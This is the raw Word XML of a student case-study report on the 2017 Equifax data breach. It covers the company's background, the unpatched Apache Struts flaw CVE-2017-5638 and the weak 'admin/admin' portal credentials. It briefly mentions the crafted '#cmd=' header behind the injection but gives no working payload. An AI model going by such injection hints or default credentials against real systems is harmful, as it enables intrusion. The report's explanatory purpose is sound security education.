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1AB7E" w14:textId="593D624F" w:rsidR="00C73724" w:rsidRDefault="009012BF" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48761887" w14:textId="77777777" w:rsidR="00C73724" w:rsidRDefault="00C73724" w:rsidP="00C73724">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E33CDE6" w14:textId="77777777" w:rsidR="00C73724" w:rsidRDefault="00C73724" w:rsidP="00C73724">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5A0ABA" w14:textId="77777777" w:rsidR="00C73724" w:rsidRDefault="00C73724" w:rsidP="00C73724">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A98142" w14:textId="046ED124" w:rsidR="00C73724" w:rsidRPr="00C73724" w:rsidRDefault="00C73724" w:rsidP="00C73724">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Equifax Inc. Data Breach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42899F46" w14:textId="04CE62BE" w:rsidR="00C73724" w:rsidRPr="00C73724" w:rsidRDefault="00C73724" w:rsidP="00C73724">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Joshua Gould</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAEB9FC" w14:textId="612A4236" w:rsidR="00C73724" w:rsidRPr="00C73724" w:rsidRDefault="00C73724" w:rsidP="00C73724">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10-30-2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6FEE0" w14:textId="360BFBF9" w:rsidR="00C73724" w:rsidRDefault="00C73724" w:rsidP="00C73724">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cyber Security Clinic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DF0793" w14:textId="1777E3AD" w:rsidR="009012BF" w:rsidRPr="007D02A2" w:rsidRDefault="00C73724" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48E3A198" wp14:editId="5E188158">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4391025</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2276475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1412240" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21300"/>
                <wp:lineTo x="21270" y="21300"/>
                <wp:lineTo x="21270" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="2" name="Picture 2" descr="Image result for Retail Credi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tail Credit company"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="14287" t="10127" r="12697" b="5064"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="141224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F52" w:rsidRPr="00C73724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="004D5F52" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>quifax Incorporate is a credit reporting agency</w:t>
      </w:r>
      <w:r w:rsidR="00BB1E04" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that distributes</w:t>
      </w:r>
      <w:r w:rsidR="004D5F52" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> information on 800 million individual consumers </w:t>
      </w:r>
      <w:r w:rsidR="00BB1E04" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">along with </w:t>
      </w:r>
      <w:r w:rsidR="004D5F52" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>88 million businesses worldwide. Equifax sells credit monitoring and fraud-prevention services directly to consumers</w:t>
      </w:r>
      <w:r w:rsidR="000E1B63" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001B2958" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The incorporate owns</w:t>
      </w:r>
      <w:r w:rsidR="000E1B63" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> massive amounts of data </w:t>
      </w:r>
      <w:r w:rsidR="001B2958" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on consumers and possess the ability to</w:t>
      </w:r>
      <w:r w:rsidR="000E1B63" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> turn over</w:t>
      </w:r>
      <w:r w:rsidR="001B2958" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the said data</w:t>
      </w:r>
      <w:r w:rsidR="000E1B63" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to anyone who want</w:t>
      </w:r>
      <w:r w:rsidR="001B2958" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="000E1B63" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to know credit of certain individuals.</w:t>
      </w:r>
      <w:r w:rsidR="00725DD1" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Originally named Retail Credit Company before its last controversy, Equifax changed its name for a better image and expanded its credit report onto companies in the United States after 1975. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA9A28" w14:textId="1EC34CAE" w:rsidR="009012BF" w:rsidRPr="007D02A2" w:rsidRDefault="00927312" w:rsidP="00C73724">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>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4384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41B4A830" wp14:editId="484BE0F0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>796290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1571625" cy="171450"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapTight wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="19200"/>
                    <wp:lineTo x="21469" y="19200"/>
                    <wp:lineTo x="2146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71625" cy="171450"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>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A830" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 4" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:72.55pt;margin-top:62.7pt;width:123.75pt;height:1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" stroked="f">
                <v:textbox inset="0,0,0,0">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v:textbox>
                <w10:wrap type="tight" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00316267" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Forward to </w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>September 7</w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2017, Equifax announced a cybercrime identity theft event. </w:t>
      </w:r>
      <w:r w:rsidR="009012BF" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Equifax breach had a major failure on the internal control of security system. The underlying causes of this breach</w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> involved </w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">n Apache Struts </w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerability with an</w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IT systems administrator using an insecure </w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">password. </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Struts is an interface for creating web applications written in Java. </w:t>
      </w:r>
      <w:r w:rsidR="00C50AF5" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Though the attack was stated to have begun in mid-May, the breach was not observed until July 29, according to Equifax CEO Richard F. Smith and a </w:t>
      </w:r>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">following </w:t>
      </w:r>
      <w:r w:rsidR="00C50AF5" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>report by Equifax</w:t>
      </w:r>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B50FFE" w14:textId="719AA83E" w:rsidR="000E4CC2" w:rsidRDefault="0030178C" w:rsidP="00EA4394">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>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2336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EBE6C02" wp14:editId="55C80CE5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>6496050</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2038350" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTight wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="18000"/>
                    <wp:lineTo x="21398" y="18000"/>
                    <wp:lineTo x="2139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38350" cy="114300"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>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6C02" id="Text Box 1" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:511.5pt;width:160.5pt;height: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" stroked="f">
                <v:textbox inset="0,0,0,0">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v:textbox>
                <w10:wrap type="tight" anchorx="margin" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00927312" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46737949" wp14:editId="1B462248">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4448175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2019300" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21396"/>
                <wp:lineTo x="21396" y="21396"/>
                <wp:lineTo x="21396" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="3" name="Picture 3" descr="Image result for Rick Smith, Chairman and CEO of Equi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ck Smith, Chairman and CEO of Equif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312" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="009012BF" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> known specific cause of the Equifax breach was a failure to install a well-publicized security patch to </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache Struts</w:t>
      </w:r>
      <w:r w:rsidR="00E36FC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> detailed seven months prior to the breach</w:t>
      </w:r>
      <w:r w:rsidR="00927312" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Specifically, </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-5638 </w:t>
      </w:r>
      <w:r w:rsidR="00E36FC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>published</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on March 10</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of 2017 </w:t>
      </w:r>
      <w:r w:rsidR="00E36FC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">details that </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">an exploit allows remote </w:t>
      </w:r>
      <w:r w:rsidR="00C73724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">attackers to execute arbitrary commands </w:t>
      </w:r>
      <w:r w:rsidR="00EA4394">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to abuse the Strut’s parser </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">via a </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>created message where the header contains</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> #cmd= string.</w:t>
      </w:r>
      <w:r w:rsidR="004F28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55354FE1" w14:textId="19B171DE" w:rsidR="00882C80" w:rsidRDefault="00882C80" w:rsidP="00882C80">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, reports found that </w:t>
      </w:r>
      <w:r w:rsidRPr="00882C80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Equifax ran a customer portal in Argentina for which the username and passwor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d combination was "admin/admin", a considerably weak username-password combination that can actually be the first guess that an attacker or attacker network would try in such an environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D36EE" w14:textId="2EEA3601" w:rsidR="00EA4394" w:rsidRDefault="00EA4394" w:rsidP="00C73724">
      <w:pPr>
